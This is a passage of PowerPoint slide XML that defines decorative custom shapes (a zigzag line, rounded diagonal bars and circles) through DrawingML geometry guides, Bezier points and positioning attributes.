              <a:gd name="T48" fmla="*/ 307 w 336"/>
              <a:gd name="T49" fmla="*/ 10 h 335"/>
              <a:gd name="T50" fmla="*/ 283 w 336"/>
              <a:gd name="T51" fmla="*/ 10 h 335"/>
              <a:gd name="T52" fmla="*/ 283 w 336"/>
              <a:gd name="T53" fmla="*/ 35 h 335"/>
              <a:gd name="T54" fmla="*/ 282 w 336"/>
              <a:gd name="T55" fmla="*/ 63 h 335"/>
              <a:gd name="T56" fmla="*/ 253 w 336"/>
              <a:gd name="T57" fmla="*/ 64 h 335"/>
              <a:gd name="T58" fmla="*/ 228 w 336"/>
              <a:gd name="T59" fmla="*/ 64 h 335"/>
              <a:gd name="T60" fmla="*/ 228 w 336"/>
              <a:gd name="T61" fmla="*/ 89 h 335"/>
              <a:gd name="T62" fmla="*/ 227 w 336"/>
              <a:gd name="T63" fmla="*/ 118 h 335"/>
              <a:gd name="T64" fmla="*/ 199 w 336"/>
              <a:gd name="T65" fmla="*/ 119 h 335"/>
              <a:gd name="T66" fmla="*/ 174 w 336"/>
              <a:gd name="T67" fmla="*/ 119 h 335"/>
              <a:gd name="T68" fmla="*/ 174 w 336"/>
              <a:gd name="T69" fmla="*/ 143 h 335"/>
              <a:gd name="T70" fmla="*/ 173 w 336"/>
              <a:gd name="T71" fmla="*/ 172 h 335"/>
              <a:gd name="T72" fmla="*/ 144 w 336"/>
              <a:gd name="T73" fmla="*/ 173 h 335"/>
              <a:gd name="T74" fmla="*/ 120 w 336"/>
              <a:gd name="T75" fmla="*/ 173 h 335"/>
              <a:gd name="T76" fmla="*/ 120 w 336"/>
              <a:gd name="T77" fmla="*/ 198 h 335"/>
              <a:gd name="T78" fmla="*/ 119 w 336"/>
              <a:gd name="T79" fmla="*/ 226 h 335"/>
              <a:gd name="T80" fmla="*/ 90 w 336"/>
              <a:gd name="T81" fmla="*/ 227 h 335"/>
              <a:gd name="T82" fmla="*/ 65 w 336"/>
              <a:gd name="T83" fmla="*/ 228 h 335"/>
              <a:gd name="T84" fmla="*/ 65 w 336"/>
              <a:gd name="T85" fmla="*/ 252 h 335"/>
              <a:gd name="T86" fmla="*/ 64 w 336"/>
              <a:gd name="T87" fmla="*/ 281 h 335"/>
              <a:gd name="T88" fmla="*/ 36 w 336"/>
              <a:gd name="T89" fmla="*/ 282 h 335"/>
              <a:gd name="T90" fmla="*/ 11 w 336"/>
              <a:gd name="T91" fmla="*/ 282 h 335"/>
              <a:gd name="T92" fmla="*/ 11 w 336"/>
              <a:gd name="T93" fmla="*/ 307 h 335"/>
              <a:gd name="T94" fmla="*/ 10 w 336"/>
              <a:gd name="T95" fmla="*/ 335 h 335"/>
              <a:gd name="T96" fmla="*/ 7 w 336"/>
              <a:gd name="T97" fmla="*/ 332 h 335"/>
              <a:gd name="T98" fmla="*/ 7 w 336"/>
              <a:gd name="T99" fmla="*/ 308 h 335"/>
              <a:gd name="T100" fmla="*/ 8 w 336"/>
              <a:gd name="T101" fmla="*/ 279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6" h="335">
                <a:moveTo>
                  <a:pt x="8" y="279"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="271"/>
                  <a:pt x="26" y="275"/>
                  <a:pt x="37" y="278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="281"/>
                  <a:pt x="55" y="284"/>
                  <a:pt x="61" y="278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="272"/>
                  <a:pt x="64" y="263"/>
                  <a:pt x="61" y="253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="243"/>
                  <a:pt x="55" y="232"/>
                  <a:pt x="63" y="225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="217"/>
                  <a:pt x="81" y="220"/>
                  <a:pt x="91" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101" y="227"/>
                  <a:pt x="110" y="230"/>
                  <a:pt x="116" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="218"/>
                  <a:pt x="119" y="209"/>
                  <a:pt x="116" y="199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="189"/>
                  <a:pt x="109" y="178"/>
                  <a:pt x="117" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="163"/>
                  <a:pt x="135" y="166"/>
                  <a:pt x="146" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="155" y="172"/>
                  <a:pt x="164" y="175"/>
                  <a:pt x="170" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="163"/>
                  <a:pt x="173" y="154"/>
                  <a:pt x="170" y="145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="167" y="134"/>
                  <a:pt x="164" y="124"/>
                  <a:pt x="171" y="116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="108"/>
                  <a:pt x="190" y="112"/>
                  <a:pt x="200" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="209" y="118"/>
                  <a:pt x="219" y="121"/>
                  <a:pt x="225" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="230" y="109"/>
                  <a:pt x="228" y="100"/>
                  <a:pt x="225" y="90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="80"/>
                  <a:pt x="218" y="69"/>
                  <a:pt x="226" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="233" y="54"/>
                  <a:pt x="244" y="57"/>
                  <a:pt x="254" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="264" y="64"/>
                  <a:pt x="273" y="66"/>
                  <a:pt x="279" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="55"/>
                  <a:pt x="282" y="45"/>
                  <a:pt x="279" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="276" y="26"/>
                  <a:pt x="272" y="15"/>
                  <a:pt x="280" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="288" y="0"/>
                  <a:pt x="298" y="3"/>
                  <a:pt x="309" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="318" y="9"/>
                  <a:pt x="327" y="12"/>
                  <a:pt x="333" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="336" y="9"/>
                  <a:pt x="336" y="9"/>
                  <a:pt x="336" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="17"/>
                  <a:pt x="318" y="13"/>
                  <a:pt x="307" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="298" y="7"/>
                  <a:pt x="289" y="4"/>
                  <a:pt x="283" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="277" y="16"/>
                  <a:pt x="280" y="25"/>
                  <a:pt x="283" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="286" y="45"/>
                  <a:pt x="289" y="56"/>
                  <a:pt x="282" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="274" y="71"/>
                  <a:pt x="263" y="68"/>
                  <a:pt x="253" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="243" y="61"/>
                  <a:pt x="234" y="58"/>
                  <a:pt x="228" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="70"/>
                  <a:pt x="225" y="79"/>
                  <a:pt x="228" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="99"/>
                  <a:pt x="235" y="110"/>
                  <a:pt x="227" y="118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="125"/>
                  <a:pt x="209" y="122"/>
                  <a:pt x="199" y="119"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189" y="116"/>
                  <a:pt x="180" y="113"/>
                  <a:pt x="174" y="119"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="125"/>
                  <a:pt x="171" y="134"/>
                  <a:pt x="174" y="143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="154"/>
                  <a:pt x="181" y="164"/>
                  <a:pt x="173" y="172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="165" y="180"/>
                  <a:pt x="155" y="176"/>
                  <a:pt x="144" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135" y="170"/>
                  <a:pt x="126" y="167"/>
                  <a:pt x="120" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114" y="179"/>
                  <a:pt x="117" y="188"/>
                  <a:pt x="120" y="198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="208"/>
                  <a:pt x="126" y="219"/>
                  <a:pt x="119" y="226"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="111" y="234"/>
                  <a:pt x="100" y="231"/>
                  <a:pt x="90" y="227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="224"/>
                  <a:pt x="71" y="222"/>
                  <a:pt x="65" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="233"/>
                  <a:pt x="62" y="243"/>
                  <a:pt x="65" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="262"/>
                  <a:pt x="72" y="273"/>
                  <a:pt x="64" y="281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="288"/>
                  <a:pt x="46" y="285"/>
                  <a:pt x="36" y="282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="279"/>
                  <a:pt x="17" y="276"/>
                  <a:pt x="11" y="282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="288"/>
                  <a:pt x="8" y="297"/>
                  <a:pt x="11" y="307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="317"/>
                  <a:pt x="17" y="328"/>
                  <a:pt x="10" y="335"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="332"/>
                  <a:pt x="7" y="332"/>
                  <a:pt x="7" y="332"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="326"/>
                  <a:pt x="10" y="317"/>
                  <a:pt x="7" y="308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="297"/>
                  <a:pt x="0" y="287"/>
                  <a:pt x="8" y="2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AF940197-18E6-4C04-8B36-34A79B8755E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1982220" y="1624149"/>
            <a:ext cx="1489075" cy="1487488"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 726 w 762"/>
              <a:gd name="T1" fmla="*/ 36 h 762"/>
              <a:gd name="T2" fmla="*/ 726 w 762"/>
              <a:gd name="T3" fmla="*/ 163 h 762"/>
              <a:gd name="T4" fmla="*/ 163 w 762"/>
              <a:gd name="T5" fmla="*/ 727 h 762"/>
              <a:gd name="T6" fmla="*/ 35 w 762"/>
              <a:gd name="T7" fmla="*/ 727 h 762"/>
              <a:gd name="T8" fmla="*/ 35 w 762"/>
              <a:gd name="T9" fmla="*/ 727 h 762"/>
              <a:gd name="T10" fmla="*/ 35 w 762"/>
              <a:gd name="T11" fmla="*/ 599 h 762"/>
              <a:gd name="T12" fmla="*/ 599 w 762"/>
              <a:gd name="T13" fmla="*/ 36 h 762"/>
              <a:gd name="T14" fmla="*/ 726 w 762"/>
              <a:gd name="T15" fmla="*/ 36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2" h="762">
                <a:moveTo>
                  <a:pt x="726" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="762" y="71"/>
                  <a:pt x="762" y="128"/>
                  <a:pt x="726" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163" y="727"/>
                  <a:pt x="163" y="727"/>
                  <a:pt x="163" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="762"/>
                  <a:pt x="70" y="762"/>
                  <a:pt x="35" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="727"/>
                  <a:pt x="35" y="727"/>
                  <a:pt x="35" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="692"/>
                  <a:pt x="0" y="635"/>
                  <a:pt x="35" y="599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="599" y="36"/>
                  <a:pt x="599" y="36"/>
                  <a:pt x="599" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="634" y="0"/>
                  <a:pt x="691" y="0"/>
                  <a:pt x="726" y="36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24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D56BD4-8D6F-4FD6-8011-C645F2C8D445}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3686403" y="1411607"/>
            <a:ext cx="893763" cy="890588"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 422 w 457"/>
              <a:gd name="T1" fmla="*/ 35 h 456"/>
              <a:gd name="T2" fmla="*/ 422 w 457"/>
              <a:gd name="T3" fmla="*/ 162 h 456"/>
              <a:gd name="T4" fmla="*/ 163 w 457"/>
              <a:gd name="T5" fmla="*/ 421 h 456"/>
              <a:gd name="T6" fmla="*/ 35 w 457"/>
              <a:gd name="T7" fmla="*/ 421 h 456"/>
              <a:gd name="T8" fmla="*/ 35 w 457"/>
              <a:gd name="T9" fmla="*/ 421 h 456"/>
              <a:gd name="T10" fmla="*/ 35 w 457"/>
              <a:gd name="T11" fmla="*/ 294 h 456"/>
              <a:gd name="T12" fmla="*/ 294 w 457"/>
              <a:gd name="T13" fmla="*/ 35 h 456"/>
              <a:gd name="T14" fmla="*/ 422 w 457"/>
              <a:gd name="T15" fmla="*/ 35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7" h="456">
                <a:moveTo>
                  <a:pt x="422" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="457" y="70"/>
                  <a:pt x="457" y="127"/>
                  <a:pt x="422" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163" y="421"/>
                  <a:pt x="163" y="421"/>
                  <a:pt x="163" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="456"/>
                  <a:pt x="70" y="456"/>
                  <a:pt x="35" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="421"/>
                  <a:pt x="35" y="421"/>
                  <a:pt x="35" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="386"/>
                  <a:pt x="0" y="329"/>
                  <a:pt x="35" y="294"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="294" y="35"/>
                  <a:pt x="294" y="35"/>
                  <a:pt x="294" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329" y="0"/>
                  <a:pt x="386" y="0"/>
                  <a:pt x="422" y="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26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F77CF0-1458-4140-9E61-44D7565420D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10263187" y="4295775"/>
            <a:ext cx="1257300" cy="1257300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 608 w 643"/>
              <a:gd name="T1" fmla="*/ 35 h 644"/>
              <a:gd name="T2" fmla="*/ 608 w 643"/>
              <a:gd name="T3" fmla="*/ 163 h 644"/>
              <a:gd name="T4" fmla="*/ 162 w 643"/>
              <a:gd name="T5" fmla="*/ 609 h 644"/>
              <a:gd name="T6" fmla="*/ 35 w 643"/>
              <a:gd name="T7" fmla="*/ 609 h 644"/>
              <a:gd name="T8" fmla="*/ 35 w 643"/>
              <a:gd name="T9" fmla="*/ 609 h 644"/>
              <a:gd name="T10" fmla="*/ 35 w 643"/>
              <a:gd name="T11" fmla="*/ 481 h 644"/>
              <a:gd name="T12" fmla="*/ 480 w 643"/>
              <a:gd name="T13" fmla="*/ 35 h 644"/>
              <a:gd name="T14" fmla="*/ 608 w 643"/>
              <a:gd name="T15" fmla="*/ 35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3" h="644">
                <a:moveTo>
                  <a:pt x="608" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="643" y="71"/>
                  <a:pt x="643" y="128"/>
                  <a:pt x="608" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162" y="609"/>
                  <a:pt x="162" y="609"/>
                  <a:pt x="162" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="644"/>
                  <a:pt x="70" y="644"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="573"/>
                  <a:pt x="0" y="516"/>
                  <a:pt x="35" y="481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516" y="0"/>
                  <a:pt x="573" y="0"/>
                  <a:pt x="608" y="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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F5964F-1AF9-4361-AF40-A99A57E074E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1878240" y="1219520"/>
            <a:ext cx="401638" cy="403225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 206"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 206"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 206"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 206"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 206"/>
              <a:gd name="T9" fmla="*/ 3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6">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="206" y="73"/>
                  <a:pt x="206" y="132"/>
                  <a:pt x="169" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="206"/>
                  <a:pt x="73" y="206"/>
                  <a:pt x="36" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="132"/>
                  <a:pt x="0" y="73"/>
                  <a:pt x="36" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="0"/>
                  <a:pt x="132" y="0"/>
                  <a:pt x="169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28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20353C5A-4588-40B0-AD2F-12E283A09BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3388745" y="1293949"/>
            <a:ext cx="401638" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 205"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 205"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 205"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 205"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 205"/>
              <a:gd name="T9" fmla="*/ 3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6">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="205" y="73"/>
                  <a:pt x="205" y="132"/>
                  <a:pt x="169" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="206"/>
                  <a:pt x="73" y="206"/>
                  <a:pt x="36" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="132"/>
                  <a:pt x="0" y="73"/>
                  <a:pt x="36" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="0"/>
                  <a:pt x="132" y="0"/>
                  <a:pt x="169" y="36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29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC39E1E7-6B77-4D48-B3EA-2454E52CE088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9907587" y="5491162"/>
            <a:ext cx="403225" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 206"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 206"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 206"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 206"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 206"/>
              <a:gd name="T9" fmla="*/ 3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6">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="206" y="73"/>
                  <a:pt x="206" y="132"/>
                  <a:pt x="169" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="206"/>
                  <a:pt x="73" y="206"/>
                  <a:pt x="36" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="132"/>
                  <a:pt x="0" y="73"/>
                  <a:pt x="36" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="0"/>
                  <a:pt x="132" y="0"/>
                  <a:pt x="169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209FD6D3-F58D-4502-91D9-C9DE4D6CDBE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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDF74EB-32AA-439C-9999-86819FE47842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="630692" y="1649412"/>
            <a:ext cx="1257300" cy="1257300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 608 w 643"/>
              <a:gd name="T1" fmla="*/ 35 h 644"/>
              <a:gd name="T2" fmla="*/ 608 w 643"/>
              <a:gd name="T3" fmla="*/ 163 h 644"/>
              <a:gd name="T4" fmla="*/ 163 w 643"/>
              <a:gd name="T5" fmla="*/ 609 h 644"/>
              <a:gd name="T6" fmla="*/ 35 w 643"/>
              <a:gd name="T7" fmla="*/ 609 h 644"/>
              <a:gd name="T8" fmla="*/ 35 w 643"/>
              <a:gd name="T9" fmla="*/ 609 h 644"/>
              <a:gd name="T10" fmla="*/ 35 w 643"/>
              <a:gd name="T11" fmla="*/ 481 h 644"/>
              <a:gd name="T12" fmla="*/ 480 w 643"/>
              <a:gd name="T13" fmla="*/ 35 h 644"/>
              <a:gd name="T14" fmla="*/ 608 w 643"/>
              <a:gd name="T15" fmla="*/ 35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3" h="644">
                <a:moveTo>
                  <a:pt x="608" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="643" y="71"/>
                  <a:pt x="643" y="128"/>
                  <a:pt x="608" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163" y="609"/>
                  <a:pt x="163" y="609"/>
                  <a:pt x="163" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="644"/>
                  <a:pt x="70" y="644"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="573"/>
                  <a:pt x="0" y="516"/>
                  <a:pt x="35" y="481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516" y="0"/>
                  <a:pt x="573" y="0"/>
                  <a:pt x="608" y="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Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76BA4D0-28E0-4AC8-A86C-658BF159CC9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60738" y="2124075"/>
            <a:ext cx="8670524" cy="2857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21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C4363A1-C1FE-40B7-BD43-45B6CBBBE595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1997982" y="1797050"/>
            <a:ext cx="654050" cy="654050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 328 w 335"/>
              <a:gd name="T1" fmla="*/ 56 h 335"/>
              <a:gd name="T2" fmla="*/ 299 w 335"/>
              <a:gd name="T3" fmla="*/ 57 h 335"/>
              <a:gd name="T4" fmla="*/ 274 w 335"/>
              <a:gd name="T5" fmla="*/ 57 h 335"/>
              <a:gd name="T6" fmla="*/ 274 w 335"/>
              <a:gd name="T7" fmla="*/ 82 h 335"/>
              <a:gd name="T8" fmla="*/ 273 w 335"/>
              <a:gd name="T9" fmla="*/ 110 h 335"/>
              <a:gd name="T10" fmla="*/ 245 w 335"/>
              <a:gd name="T11" fmla="*/ 111 h 335"/>
              <a:gd name="T12" fmla="*/ 220 w 335"/>
              <a:gd name="T13" fmla="*/ 111 h 335"/>
              <a:gd name="T14" fmla="*/ 220 w 335"/>
              <a:gd name="T15" fmla="*/ 136 h 335"/>
              <a:gd name="T16" fmla="*/ 219 w 335"/>
              <a:gd name="T17" fmla="*/ 165 h 335"/>
              <a:gd name="T18" fmla="*/ 190 w 335"/>
              <a:gd name="T19" fmla="*/ 166 h 335"/>
              <a:gd name="T20" fmla="*/ 166 w 335"/>
              <a:gd name="T21" fmla="*/ 166 h 335"/>
              <a:gd name="T22" fmla="*/ 166 w 335"/>
              <a:gd name="T23" fmla="*/ 190 h 335"/>
              <a:gd name="T24" fmla="*/ 165 w 335"/>
              <a:gd name="T25" fmla="*/ 219 h 335"/>
